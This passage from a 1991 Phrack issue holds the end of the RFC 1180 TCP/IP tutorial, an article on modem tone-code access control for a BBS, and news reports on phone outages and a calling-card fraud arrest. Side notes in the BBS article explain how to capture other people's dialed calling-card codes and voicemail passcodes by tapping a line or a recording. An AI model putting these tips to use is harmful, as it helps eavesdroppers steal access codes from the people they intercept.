  2275.    may or may not generate checksums.  If Ethernet is the only network
  2276.    between the 2 UDP modules communicating, then you may not need
  2277.    checksumming.  However, it is recommended that checksum generation
  2278.    always be enabled because at some point in the future a route table
  2279.    change may send the data across less reliable media.
  2280.  
  2281.    If the checksum is valid (or zero), the destination port number is
  2282.    examined and if an application is bound to that port, an application
  2283.    message is queued for the application to read.  Otherwise the UDP
  2284.    datagram is discarded.  If the incoming UDP datagrams arrive faster
  2285.    than the application can read them and if the queue fills to a
  2286.    maximum value, UDP datagrams are discarded by UDP.  UDP will continue
  2287.    to discard UDP datagrams until there is space in the queue.
  2288.  
  2289. 7.  Transmission Control Protocol
  2290.  
  2291.    TCP provides a different service than UDP.  TCP offers a connection-
  2292.    oriented byte stream, instead of a connectionless datagram delivery
  2293.    service.  TCP guarantees delivery, whereas UDP does not.
  2294.  
  2295.    TCP is used by network applications that require guaranteed delivery
  2296.    and cannot be bothered with doing time-outs and retransmissions.  The
  2297.    two most typical network applications that use TCP are File Transfer
  2298.    Protocol (FTP) and the TELNET.  Other popular TCP network
  2299.    applications include X-Window System, rcp (remote copy), and the r-
  2300.    series commands.  TCP's greater capability is not without cost: it
  2301.    requires more CPU and network bandwidth.  The internals of the TCP
  2302.    module are much more complicated than those in a UDP module.
  2303.  
  2304.    Similar to UDP, network applications connect to TCP ports.  Well-
  2305.    defined port numbers are dedicated to specific applications.  For
  2306.    instance, the TELNET server uses port number 23.  The TELNET client
  2307.    can find the server simply by connecting to port 23 of TCP on the
  2308.    specified computer.
  2309.  
  2310.    When the application first starts using TCP, the TCP module on the
  2311.    client's computer and the TCP module on the server's computer start
  2312.    communicating with each other.  These two end-point TCP modules
  2313.    contain state information that defines a virtual circuit.  This
  2314.    virtual circuit consumes resources in both TCP end-points.  The
  2315.    virtual circuit is full duplex; data can go in both directions
  2316.    simultaneously.  The application writes data to the TCP port, the
  2317.    data traverses the network and is read by the application at the far
  2318.    end.
  2319.  
  2320.    As with all sliding window protocols, the protocol has a window size.
  2321.    The window size determines the amount of data that can be transmitted
  2322.    before an acknowledgement is required.  For TCP, this amount is not a
  2323.    number of TCP segments but a number of bytes.
  2324.  
  2325. 8.  Network Appliations
  2326.  
  2327.    Why do both TCP and UDP exist, instead of just one or the other?
  2328.  
  2329.    They supply different services.  Most applications are implemented to
  2330.    use only one or the other.  You, the programmer, choose the protocol
  2331.    that best meets your needs.  If you need a reliable stream delivery
  2332.    service, TCP might be best.  If you need a datagram service, UDP
  2333.    might be best.  If you need efficiency over long-haul circuits, TCP
  2334.    might be best.  If you need efficiency over fast networks with short
  2335.    latency, UDP might be best.  If your needs do not fall nicely into
  2336.    these categories, then the "best" choice is unclear.  However,
  2337.    applications can make up for deficiencies in the choice.  For
  2338.    instance if you choose UDP and you need reliability, then the
  2339.    application must provide reliability.  If you choose TCP and you need
  2340.    a record oriented service, then the application must insert markers
  2341.    in the byte stream to delimit records.
  2342.  
  2343.    What network aplications are available?
  2344.  
  2345.    There are far too many to list.  The number is growing continually.
  2346.    Some of the applications have existed since the beginning of internet
  2347.    technology: TELNET and FTP.  Others are relatively new: X-Windows and
  2348.    SNMP.  The following is a brief description of the applications
  2349.    mentioned in this tutorial.
  2350.  
  2351. 8.1  TELNET
  2352.  
  2353.    TELNET provides a remote login capability on TCP.  The operation and
  2354.    appearance is similar to keyboard dialing through a telephone switch.
  2355.    On the command line the user types "telnet delta" and receives a
  2356.    login prompt from the computer called "delta".
  2357.  
  2358.    TELNET works well; it is an old application and has widespread
  2359.    interoperability.  Implementations of TELNET usually work between
  2360.    different operating systems.  For instance, a TELNET client may be on
  2361.    VAX/VMS and the server on UNIX System V.
  2362.  
  2363. 8.2  FTP
  2364.  
  2365.    File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has
  2366.    widespread interoperability.  The operation and appearance is as if
  2367.    you TELNETed to the remote computer.  But instead of typing your
  2368.    usual commands, you have to make do with a short list of commands for
  2369.    directory listings and the like.  FTP commands allow you to copy
  2370.    files between computers.
  2371.  
  2372. 8.3  rsh
  2373.  
  2374.    Remote shell (rsh or remsh) is one of an entire family of remote UNIX
  2375.    style commands.  The UNIX copy command, cp, becomes rcp.  The UNIX
  2376.    "who is logged in" command, who, becomes rwho.  The list continues
  2377.    and is referred to collectively to as the "r" series commands or the
  2378.    "r*" (r star) commands.
  2379.  
  2380.    The r* commands mainly work between UNIX systems and are designed for
  2381.    interaction between trusted hosts.  Little consideration is given to
  2382.    security, but they provide a convenient user environment.
  2383.  
  2384.    To execute the "cc file.c" command on a remote computer called delta,
  2385.    type "rsh delta cc file.c".  To copy the "file.c" file to delta, type
  2386.    "rcp file.c delta:".  To login to delta, type "rlogin delta", and if
  2387.    you administered the computers in a certain wa, you will not be
  2388.    challenged with a password prompt.
  2389.  
  2390. 8.4  NFS
  2391.  
  2392.    Network File System, first developed by Sun Microsystems Inc, uses
  2393.    UDP and is excellent for mounting UNIX file systems on multiple
  2394.    computers.  A diskless workstation can access its server's hard disk
  2395.    as if the disk were local to the workstation.  A single disk copy of
  2396.    a database on mainframe "alpha" can also be used by mainframe "beta"
  2397.    if the database's file system is NFS mounted commands to
  2398.    use the NFS mounted disk as if it were local disk.
  2399.  
  2400. 8.5  SNMP
  2401.  
  2402.    Simple Network Management Protocol (SNMP) uses UDP and is designed
  2403.    for use by central network management stations.  It is a well known
  2404.    fact that if given enough data, a network manager can detect and
  2405.    diagnose network problems.  The central station uses SNMP to collect
  2406.    this data from other computers on the network.  SNMP defines the
  2407.    format for the data; it is left to the central station or network
  2408.    manager to interpret the data.
  2409.  
  2410. 8.6  X-Window
  2411.  
  2412.    The X Window System uses the X Window protocol on TCP to draw windows
  2413.    on a workstation's bitmap display.  X Window is much more than a
  2414.    utility for drawing windows; it is entire philosophy for designing a
  2415.    user interface.
  2416.  
  2417. 9.  Other Information
  2418.  
  2419.    Much information about internet technology was not included in this
  2420.    tutorial.  This section lists information that is considered the next
  2421.    level of detail for the reader who wishes to learn more.
  2422.  
  2423.      o administration commands: arp, route, and netstat
  2424.      o ARP: permanent entry, publish entry, time-out entry, spoofing
  2425.      o IP route table: host entry, default gateway, subnets
  2426.      o IP: time-to-live counter, fragmentation, ICMP
  2427.      o RIP, routing loops
  2428.      o Domain Name System
  2429.  
  2430. 10.  References
  2431.  
  2432.    [1] Comer, D., "Internetworking with TCP/IP Principles, Protocols,
  2433.        and Architecture", Prentice Hall, Englewood Cliffs, New Jersey,
  2434.        U.S.A., 1988.
  2435.  
  2436.    [2] Feinler, E., et al, DDN Protocol Handbook, Volume 2 and 3, DDN
  2437.        Network Information Center, SRI International, 333 Ravenswood
  2438.        Avenue, Room EJ291, Menlow Park, California, U.S.A., 1985.
  2439.  
  2440.    [3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems
  2441.        Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990.
  2442.  
  2443. 11.  Relation to other RFCs
  2444.  
  2445.    This RFC is a tutorial and it does not UPDATE or OBSOLETE any other
  2446.    RFC.
  2447.  
  2448. 12.  Security Considerations
  2449.  
  2450.    There are security considerations within the TCP/IP protocol suite.
  2451.    To some people these considerations are serious problems, to others
  2452.    they are not; it depends on the user requirements.
  2453.    This tutorial does not discuss these issues, but if you want to learn
  2454.    more you should start with the topic of ARP-spoofing, then use the
  2455.    "Security Considerations" section of RFC 1122 to lead you to more
  2456.    information.
  2457.  
  2458. 13.  Authors' Addresses
  2459.  
  2460.    Theodore John Socolofsky
  2461.    EMail: TEDS@SPIDER.CO.UK
  2462.  
  2463.    Claudia Jeanne Kale
  2464.    EMail: CLAUDIAK@SPIDER.CO.UK
  2465.  
  2466.    Note:  This info taken from RFC-1180.
  2467. _______________________________________________________________________________
  2468.  
  2469.  
  2470.  
  2471.  
  2472.                                 ==Phrack Inc.==
  2473.  
  2474.                 Volume Three, Issue Thirty-four, File #9 of 11
  2475.  
  2476.               ._._._._._._._._._._._._._._._._._._._._._._._._.
  2477.               !                                               !
  2478.               !      Advanced Modem-Oriented BBS Security     !
  2479.               !                                               !
  2480.               !          By Laughing Gas and Dead Cow         !
  2481.               !                                               !
  2482.               !     Written Exclusively for PHRACK 8/22/91    !
  2483.               !_._._._._._._._._._._._._._._._._._._._._._._._!
  2484.  
  2485.  
  2486. * Introduction =-= Things you need to know *
  2487.  
  2488. This is an introduction and guide to setting up your BBS and modem so that a
  2489. caller must know a certain code and append it to his dialing string in order to
  2490. access the BBS.  This lets you have yet another way (besides newuser passwords,
  2491. etc) to lock out unwanted callers.
  2492.  
  2493. You can also set a certain pattern for your board's numerical code based on the
  2494. day or the month or something, and distribute this pattern instead of having to
  2495. distribute the access code.
  2496. You must have an intelligent modem to be able to run a board which requires the
  2497. access method I'm going to be discussing in this file.  However you don't need
  2498. an intelligent modem to be able to call the same board, but you do have to
  2499. enter the code manually if you do not have an intelligent modem.  (So only
  2500. certain people can run a board with this method of access control, but >almost<
  2501. anyone can call one.)
  2502.  
  2503. All modem commands in this manual will be hayes 'AT' style commands, and some
  2504. may be available only to USRobotics Courier modems with v.42bis, or certain
  2505. other intelligent modems.  If you can't get it to work with your modem, your
  2506. modem may not be able to do it, but try looking in your modem manual, just in
  2507. case.
  2508.  
  2509. NOTE: The ONLY modem that this method has been tested with is a USRobotics
  2510. Courier HST modem, (the new kind) with the v.42bis.  I tested it with my modem
  2511. which is an older HST (14.4, but no v.42bis) and it did NOT accept the AT%T
  2512. command (it returned "ERROR"). Check page 83 of your HST manual for more info,
  2513. or type AT%$ for on-line help from the modem firmware. (about as helpful as the
  2514. manual, and neither are very detailed.)
  2515.  
  2516. Things to know:
  2517.         ATDT1234567;    This command causes your modem to dial 1234567 and
  2518.                        then return to command mode.
  2519.         ATDT1234567@1;  This command causes your modem to dial 1234567, wait for
  2520.                         an answer, dial 1 and return to command mode.
  2521. |-----> AT%T            This command causes every tone that goes into the modem
  2522. |                       to be identified and followed with a 0.
  2523. |
  2524. |---------------------- This is the key to the whole enchilada.
  2525.  
  2526. Alternate commands may be available depending on your modem type.
  2527.  
  2528. * Concept =-= How-To
  2529.  
  2530. The concept for the bbs access code would be as follows.
  2531.  
  2532. The caller dials the number to the BBS, when the BBS picks up, it sends a
  2533. digit, then the caller sends a responding set of digits.  If the digits which
  2534. the caller sends match the access code for the BBS, the BBS will send an answer
  2535. tone and the caller's modem will acknowledge and connection.
  2536.  
  2537. How it works is like this:
  2538.  (Sample Transcript)
  2539.  
  2540. CALLER> ATDT1234567@234
  2541.    BBS> RING
  2542.    BBS> ATDT1;
  2543.    BBS> OK
  2544.    BBS> AT%T
  2545.    BBS> 203040
  2546.    BBS> ATA
  2547.  
  2548. What happens is the caller dials 1234567 (the number of the BBS) the '@' tells
  2549. the callers modem to wait for a result (which is received when the BBS gets a
  2550. ring and sends a 1) then the callers modem dials 234 (the access code) after
  2551.  
  2552. the BBS sent the '1' it got a OK so it sent a AT%T which told it to monitor
  2553. tones.  This command returned "203040" which is 234 followed by 0's (the format
  2554. of the output of AT%T) the BBS software would have to watch for this string.
  2555. Since 234 was the right code, the board sent an ATA which would connect the
  2556. caller since it's dial command was still open.  If 234 hadn't been the code,
  2557. then the BBS would have sent a ATH0.
  2558.  
  2559. * Manual Dialing =-= Lame modems *
  2560.  
  2561. Anyway, if you don't have a modem that does the AT%T or ATDT1; commands you
  2562. CANNOT run a BBS with this type of security, unless your modem has EQUIVALENT
  2563. commands, or you can figure out a way to do it with the commands your modem
  2564. has.  The toughest part is the reading of tones, which, as far as I know, is
  2565. unique to the HST/Courier modems.
  2566.  
  2567. However, if your modem does not do the ATDT1@1 thing, then you can PROBABLY
  2568. still call a board using this security.  This is assuming you can just send a
  2569. "dial command" to your modem without a number (ie ATD on an HST.)  What you do
  2570. is dial the BBS number manually, then you'll here a beep, you dial the code,
  2571. then send the dial command to your modem and put the phone down.  This should
  2572. connect you in the same fashion.. (ie..)
  2573.  
  2574. CALLER> manually dials BBS
  2575.    BBS> ATDT1;
  2576. CALLER> hears beep and dials 234, then sends ATD to his modem and puts the
  2577.         phone down.
  2578.    BBS> OK
  2579.    BBS> AT%T
  2580.    BBS> 203040
  2581.    BBS> ATA
  2582. CALLER> his modem connects.
  2583.  
  2584. * Bells and Whistles =-= Wrapping It Up *
  2585.  
  2586. Your options when using this type of security.  There are many different things
  2587. you can do.
  2588.  
  2589. Method #1: You can say "Hey, the access code for my board is 234" and give
  2590. that to the people you want to call.
  2591.  
  2592. Method #2: Set a pattern for your access codes.  Say, the date (ie, for today,
  2593. 8-22-91 the code would be 082291), or you could get more complex (add one to
  2594. each digit, run it through an algorithm, etc)
  2595.  
  2596. Method #3: Distribute a program that generates the code based on the day, the
  2597. month, what have you.  (However this is only a solution if you can either
  2598. distribute a program like this to EVERY type of operating system, or you only
  2599. want callers from one operating system (or several, the only ones you can
  2600. produce it for..)
  2601.  
  2602. Method #4: Have the BBS accept several codes, and give out  different code to
  2603. each class of users (say, newusers to apply = 1234, validated = 2345, elite =
  2604. 3456) or something like that, this would allow for control of who calls when,
  2605. as well as logging of call class frequency, etc.
  2606.  
  2607. Method #5: Have a specific code for each user.  This would take a lot of
  2608. maintenance, but would provide for a VERY secure BBS environment.  This would
  2609. allow the same advantages above as well (logging, freq. etc).
  2610.  
  2611. Things to keep in mind however are if you have an access code generated by a
  2612. program or by the date, etc. you have to change the code whenever the program
  2613. would.
  2614.  
  2615. An interesting side note here is that the AT%T command can be used to call a
  2616. COCOT (private payfone) and record the tones, or possibly to record codes other
  2617. people entered, etc.  (Ie, bring your laptop with modem to a office, attach
  2618. it to an extension and wait for a person to pick up, issue the ATD; command
  2619. right away, then AT%T command.  If the person dials a 950, you should get
  2620. something like
  2621.  
  2622.         90500010003030 (pause) 203040506070
  2623.  
  2624. that is assuming the code is 234567.  Congratulations, you now have their code.
  2625. The modem can recognize the dtmf tones for 0-9, *, #, and the silver box tones
  2626. A, B, C, and E.  I'm sure other interesting uses for this feature can be
  2627. found, and I'd love to hear from the other people out there in the h/p world.
  2628.   I'm sure a lot of you have seen me around, for those that haven't I can be
  2629. reached on my board, Solsbury Hill or Ripco (312) or on Internet as
  2630. lgas@doomsday.spies.com.
  2631.  
  2632. (Note: Spies is down as of this writing, I have some other accounts, but I'd
  2633. prefer that most of them remain unknown... if anyone wants to offer me an
  2634. account I can use just for mail where I can have my alias for the account
  2635. name, on a stable system, please contact me.)
  2636.  
  2637.  
  2638. * Non-BBS Oriented Stuff =-= Conclusion *
  2639.  
  2640. In some issue of 2600 magazine someplace at some time they published an article
  2641. on how to build a tone detection device: Now you have your own, built in to the
  2642. modem.
  2643.  
  2644. An example application of this "in the field" would be calling a COCOT and
  2645. using the modem to decipher the tones.  That would be done:
  2646.  
  2647. ATDT3014283268;                      ;call the COCOT
  2648. AT%T                                 ;get tones
  2649.  
  2650. it should respond with the decoded tones.
  2651.  
  2652. You could fool around with it and get it to accept input from a tape recorder,
  2653. this gives you a way to decipher recorded VMB passcodes, or phone numbers, or
  2654. anything else that was recorded as it was dialed. Or use it with a radio
  2655. scanner set to scan the freqs that cordless fones operate on, and record those
  2656. tones. Then play 'em back into the modem and they're yours.
  2657.  
  2658. In conclusion... (ahem).. This is an area which I believe has never been
  2659. breached before, and this idea was brought to you by THUGS.  As long as
  2660. technology keeps advancing, we'll be here to bring you the latest tricks such
  2661. as this one.  Please contact me if you have any information about this area
  2662. (tone detection via modem, or anything relating to it at all..) especially if
  2663. you know of modems besides the v.42bis models of USRobotic's HSTs that can do
  2664. this.
  2665.  
  2666. Laughing Gas
  2667. Solsbury Hill BBS (301-428-3268)
  2668. _______________________________________________________________________________
  2669.  
  2670.  
  2671.  
  2672.                                ==Phrack Inc.==
  2673.  
  2674.                 Volume Three, Issue Thirty-Four, File #10 of 11
  2675.  
  2676.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2677.               PWN                                             PWN
  2678.               PWN              Phrack World News              PWN
  2679.               PWN                                             PWN
  2680.               PWN           Issue XXXIV / Part One            PWN
  2681.               PWN                                             PWN
  2682.               PWN            Compiled by Dispater             PWN
  2683.               PWN                                             PWN
  2684.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2685.  
  2686.  
  2687. What We Have Got Here Today is Failure to Communicate
  2688. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2689. Editors Comment: Dispater
  2690.  
  2691.      With hundreds, maybe thousands of lives at stake, three airports in New
  2692. York had to shut down due to a long distance carrier failing.  It is absolutely
  2693. amazing how irresponsible these services were to rely on only on form of
  2694. communication.  Where was the back up system?  This incident might not have
  2695. happened it they would have had an alternative carrier or something as simple
  2696. as two way radios.
  2697.  
  2698.      Many people are running around these days screaming about how
  2699. irresponsible AT&T was.  The real problem lyes with people in our society
  2700. failing to take the time to learn fundamental aspects of the common technology.
  2701.  
  2702.      It is also a shame that the people "in control" were incapable of using
  2703. something as simple as a "port" to dial through another extender.  This
  2704. is the kind of thing that happens when people choose to isolate themselves
  2705. from the technological society we have today.
  2706.  
  2707.      What follows is a compilation of several articles dealing with AT&T long
  2708. distance carrier failures.
  2709.  
  2710. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2711.  
  2712. Thank You for abUsing AT&T                                     October 18, 1991
  2713. ~~~~~~~~~~~~~~~~~~~~~~~~~
  2714. by Kimberly Hayes Taylor and Steve Marshall (USA Today "Phone Failure Stalls
  2715.    Air Traffic Disruption in N.Y. Felt Nationwide")
  2716.  
  2717.      Air traffic in and out of New York City resumed late Tuesday after a
  2718. phone-service failure virtually shut down three airports for almost four
  2719. hours.  Hundreds of flights coast to coast were delayed or canceled when
  2720. controllers at John F. Kennedy, La Guardia and Newark (New Jersey) airports
  2721. lost the link that allows communication among themselves or with other U.S.
  2722. airports.  Communications between pilots and air-traffic controllers travel
  2723. over telephone lines to ground-based radio equipment.  AT&T spokesman Herb
  2724. Linnen blamed an internal power failure in a long-distance switching office
  2725. in Manhattan.  Hours after the 4:50 PM EDT failure, 40 planes loaded with
  2726. passengers were sitting on the runway at Kennedy, 35 at Newark, 30 at La
  2727. Guardia.  "During the height of the thing, at least 300 aircraft were delayed
  2728. at metropolitan airports," said Bob Fulton, a spokesperson for the Federal
  2729. Aviation Administration.  Included: flights taking off "from California to
  2730. Florida" and headed for New York, said FAA's Fred Farrar.  Farrar said planes
  2731. had to be grounded for safety.  Without telephone communication, they would
  2732. "fly willy-nilly."  Among diverted flights: a British Airways supersonic
  2733. Concorde from London, which landed at Bradley airport outside Hartford, Conn.
  2734. Passenger reaction:  at Washington's National Airport, Dominique Becoeur of
  2735. Paris was "reading, drinking, and thinking" while waiting for a flight to New
  2736. York.  At La Guardia, Ernie Baugh, of Chattanooga, Tenn., said, "I think I
  2737. will go and have another beer."  Flights were reported resuming by 9 p.m.
  2738. EDT.  Linnen said AT&T was busy Tuesday night restoring long-distance service
  2739. in and out of New York City, which had been interrupted.  Some international
  2740. service also had been affected.
  2741.  
  2742. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2743.  
  2744. AT&T's Hang Ups                                                October 19, 1991
  2745. ~~~~~~~~~~~~~~
  2746. By John Schneidawind (USA Today - "The Big Hang-Up Phone Crash Grounds
  2747.    Airplanes, Raises Anger")
  2748.  
  2749.      The Federal Administration Aviation has some good news for travelers who
  2750. were stranded at airports, or delayed for hours, the past two days by the New
  2751. York City telephone outage.  If a similar phone disaster strikes next month,
  2752. hardly any fliers will know the difference.  That's because AT&T is close to
  2753. completing installation of a network of microwave dishes that will
  2754. supplement, if not replace, the phone lines AT&T uses to relay calls between
  2755. air-traffic controllers in different cities.  Tuesday evening, flights in and
  2756. out of some of the nation's busiest airports - Kennedy, La Guardia, and
  2757. Newark, N.J. - were grounded because FAA controllers couldn't communicate
  2758. with one another.  For much of the 1980's, land-based fiber optic lines have
  2759. been slowly replacing microwave phone dishes phone companies long have used
  2760. to transmit telephone calls.  That's because fiber-optic wires were thought
  2761. to provide clearer calls than microwave technology.  Now, it's becoming
  2762. apparent that sending some or most telephone calls via wireless microwave
  2763. might ease the burden handled by fiber-optic cables.  In addition, a
  2764. microwave call could be transmitted point-to-point, bypassing an inoperative
  2765. switching center when a breakdown or catastrophe occurs.
  2766.  
  2767. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2768.  
  2769. Computer Maker Says Tiny Software Flaw Caused Phone Disruptions
  2770. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2771. by Edmund L Andrews (New York Times)
  2772.  
  2773.      WASHINGTON -- A manufacturer of telephone call-routing computers
  2774. said that a defect in three or four lines of computer code, rather than a
  2775. hacker or a computer "virus," appeared to be the culprit behind a mysterious
  2776. spate of breakdowns that disrupted local telephone service for 10 million
  2777. customers around the country in late June and early this month.
  2778.  
  2779.      In congressional testimony Tuesday, an official of the manufacturer, DSC
  2780. Communications of Plano, Texas, said all the problems had been traced to recent
  2781. upgrades in its software, which had not been thoroughly tested for hidden
  2782. "bugs."
  2783.      Although the telephone companies that experienced failures were using
  2784. slightly different versions of the software, the company said, each version was
  2785. infected with the flaw.  "Our equipment was without question a major
  2786. contributor to the disruptions," Frank Perpiglia, DSC's vice president for
  2787. technology and product development, told the House telecommunications
  2788. subcommittee.  "We must be forthright in accepting responsibility for
  2789. failure."
  2790.  
  2791.        Officials at both DSC and the regional Bell companies said they could
  2792. not entirely rule out the possibility of sabotage, but said the evidence points
  2793. strongly to unintentional errors. The flaws caused the computers to send a
  2794. flood of erroneous messages when the computer encountered routine maintenance
  2795. problems.
  2796.  
  2797. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2798.  
  2799. TELEPHONE TECHNOLOGY QUESTIONED AFTER FAILURES
  2800. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2801. by Edmund L. Andrew (New York Times)
  2802.  
  2803.      WASHINGTON -- Striking similarities between nearly simultaneous
  2804. computer malfunctions that disrupted local telephone service on the East Coast
  2805. and in Los Angeles on Wednesday have raised questions among communications
  2806. experts about the reliability of advanced networks that all the Bell telephone
  2807. companies are now installing.
  2808.  
  2809.      The problems experienced by both Pacific Bell and the Chesapeake and
  2810. Potomac Co., which serves Washington, Maryland, Virginia and parts of West
  2811. Virginia, involved computer programs on advanced call-routing equipment, which
  2812. uses the same new technology, one being adopted throughout the communications
  2813. industry.
  2814.  
  2815.      The problems, which were corrected in both areas by early evening on
  2816. Wednesday, made it impossible for about nine million telephone customers to
  2817. complete local telephone calls.
  2818.  
  2819.      Although the origins of both malfunctions remained unclear on Thursday,
  2820. the difficulties at the two companies bore a strong resemblance to a brief but
  2821. massive breakdown experienced by the American Telephone and Telegraph Co.'s
  2822. long-distance lines in January 1990.
  2823.  
  2824.      In all three cases, a problem at one switching center quickly corrupted
  2825. other switches and paralyzed much of the system. Perhaps the biggest fear,
  2826. federal regulators say, is that as telephone companies link their networks more
  2827. closely, malfunctions at one company can infect systems at other companies and
  2828. at long-distance carriers.
  2829.  
  2830.      "What you want to avoid is the situation where one system contaminates
  2831. another," said an investigator at the Federal Communications Commission who
  2832. insisted on anonymity.
  2833.  
  2834.      "I guess the ultimate concern is that software or hardware would be
  2835. deployed in a way that the corruption could be processed through entire
  2836. network, and there would be no alternatives available."
  2837.      As the telephone companies and government regulators tried to determine
  2838. more precisely on Thursday what went wrong, investigators at the communications
  2839. commission said they would also look at several other questions:
  2840.  
  2841.      Are there system wide problems that have gone unnoticed until now?  Can
  2842. telephone companies reduce risks by reducing their dependence on one type of
  2843. switching equipment?  Were the disruptions caused by computer operators outside
  2844. the telephone companies trying to sabotage the systems?
  2845.  
  2846.      Officials at both companies discounted the possibility that a computer
  2847. hacker might have caused the failures, and outside experts tended to agree.
  2848.  
  2849.      "There's always that possibility, but most likely it was some kind of
  2850. glitch or bug in the software," said A. Michael Noll, a professor at the
  2851. Annenberg School of Communications at the University of Southern California and
  2852. author of several textbooks on telecommunications technology.
  2853.  
  2854.      Several independent communications experts said the problems reflected
  2855. the difficulty of spotting all the hidden problems in complex software before
  2856. putting it into commercial use.
  2857.  
  2858.      "It's very hard to simulate all the possibilities in a laboratory," said
  2859. Richard Jay Solomon, a telecommunications consultant and research associate at
  2860. the Massachusetts Institute of Technology.  "You have to go out in the field
  2861. and keep your fingers crossed."
  2862.  
  2863.      As more information became available on Thursday, the two disruptions
  2864. appeared to be almost identical. The problem at Chesapeake & Potomac, a
  2865. subsidiary of the Bell Atlantic Corp., began as the company was increasing the
  2866. traffic being routed by one of its four signal processing computers. For
  2867. reasons that remain a mystery, the system began to malfunction about 11:40 a.m.
  2868.  
  2869.      The computer was supposed to shut itself down, allowing the traffic to
  2870. be handled by other computers. Instead, it sent out a barrage of erroneous
  2871. signals, apparently overwhelming the other two computers.  "It was as if bogus
  2872. information was being sent," said Edward Stanley, a company spokesman.
  2873.  
  2874.      The same thing seems to have occurred almost two hours later, at about 11
  2875. a.m., in Los Angeles, said Paul Hirsch, a spokesman for Pacific Bell, a
  2876. subsidiary of the Pacific Telesis Group.
  2877.  
  2878.      Hirsch said the problem began when one of four signal transfer points
  2879. signaled to the others that it was having problems. The other three computers
  2880. froze after being overloaded by signals the defective computer.
  2881.  
  2882.      Hirsch said his company continued to believe that the two telephone
  2883. incidents were completely unrelated.  "Someone wins the lottery every week,"
  2884. he said.  "Stranger things can happen."
  2885.  
  2886.      Officials at Chesapeake and Potomac said the problems were probably
  2887. unrelated.  Asked if hackers could have caused the problems, Ellen Fitzgerald,
  2888. a spokeswoman for Chesapeake and Potomac, said she had been assured that
  2889. the system could not be penetrated.  But, she added, "a few days ago I would
  2890. have told you that what happened yesterday wouldn't happen."
  2891.      Terry Adams, a spokesman at the DSC Communications Corp., which made
  2892. both systems, said company officials also discounted any connection between the
  2893. failures.
  2894. ______________________________________________________________________________
  2895.  
  2896.  
  2897.  
  2898.                                ==Phrack Inc.==
  2899.  
  2900.                 Volume Three, Issue Thirty-four, File #11 of 11
  2901.  
  2902.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2903.               PWN                                             PWN
  2904.               PWN             Phrack World News               PWN
  2905.               PWN                                             PWN
  2906.               PWN           Issue XXXIV,  Part Two            PWN
  2907.               PWN                                             PWN
  2908.               PWN            Compiled by Dispater             PWN
  2909.               PWN                                             PWN
  2910.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2911.  
  2912. Mind Rape or Media Rape?
  2913. ~~~~~~~~~~~~~~~~~~~~~~~
  2914. Special Thanks: Night Ranger
  2915.  
  2916. Thursday September 26, 1991  was no ordinary day for Mind Rape, a young Arizona
  2917. State college student.  When he finally made it home that day, he found his home
  2918. had been raided by the feds.  'They took EVERYTHING! Including my Metallica
  2919. tape!' he told me.  After talking to him for quite a while I learned a lot, not
  2920. just about his bust but about hacking in general.  He instructed me not to say
  2921. anything specifically on the advice of his lawyer and the EFF, but he did want
  2922. me to let the real reason he was busted be known - His electronic newsletter
  2923. entitled NSA (for National Security Anarchists).  Mind Rape has some very
  2924. important views on hacking that the government doesn't want others to hear.
  2925. Some of these views were contained in his newest and soon to be released
  2926. newsletter NSA issue number five, which was confiscated of course.  He was also
  2927. working on a book about hacker's philosophy, which was taken too.  He has not
  2928. yet been charged but in the eyes of the media he is already been tried and
  2929. found guilty.  It is unfortunate the general public gets its information from
  2930. news reports like the following because, as you can see, they can be quite
  2931. misleading.  Hopefully once Mind Rape gets everything straight he will continue
  2932. to write his book, after all it is his constitutional right to do so, and I
  2933. think it be quite informative to both the hackers of the nineties and the
  2934. outside world.
  2935.  
  2936. The following is a transcript of a news report covering his story...
  2937.  
  2938. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2939.  
  2940.      Male Announcer: That student is Donald _____ of Phoenix.  Officials of
  2941. LDL Long Distance believe he's one of around 20 hackers who've been ripping off
  2942. their company for fun and profit.  In tonight's Night Team Report we'll see how
  2943. this kind of thievery adds up.  The nation's telephone companies loose more
  2944. than a billion dollars a year to hackers.  Mark Nighten (sp?) a security
  2945. director for LDL Long Distance.  Last month he was poring through records like
  2946. these which convinced him to believe that someone was making hundreds of
  2947. computer generated phone calls to his company's 1-800 access line trying to get
  2948. customer's calling card codes.  He went to the Phoenix Police.  They got a
  2949. search warrant and traced the calls to a house near 18th Drive near Union
  2950. Hills.  Police went there last month and came away with a computer, software
  2951. and a list of phone codes, all belonging to 19 year old Donald _____ an ASU
  2952. student.   With nighten suspects _____ is just one of 20 hacker on his network
  2953. who can make thousands of dollars worth of calls which would wind up on other
  2954. people's phone bills.
  2955.  
  2956.      Mark: You can see the magnitude of this.  Off of one authorization code
  2957. you could have 10, maybe 150 other people...
  2958.  
  2959.      Male Announcer: Lemme ask ya...How bad are you getting ripped off here?
  2960.  
  2961.      Mark: We've had to have somebody on this 24 hours a day.  We've been
  2962. getting killed.
  2963.  
  2964.      Male Announcer: Hackers often sell the codes they steal to other students.
  2965. So that hundreds of students and Arizona State University and University of
  2966. Arizona also could be ripping of the company.  Students at Arizona State
  2967. University told me today that they have not herd of LDL's troubles, but they
  2968. confirmed that stolen phone codes do have a way of getting around.
  2969.  
  2970.      I iz a College Student: Someone hears...ya know...about the interest and
  2971. someone else knows somebody...ya know...and they tell you and you talk to
  2972. them and...ya know...it's not overly expensive or anything like that.
  2973.  
  2974.      Male Announcer: Dr. Dan Kneer of Arizona State University's School
  2975. of Business is a nationally recognized expert on computer crime.  [who?]  He
  2976. contends that hacking is mushrooming.
  2977.  
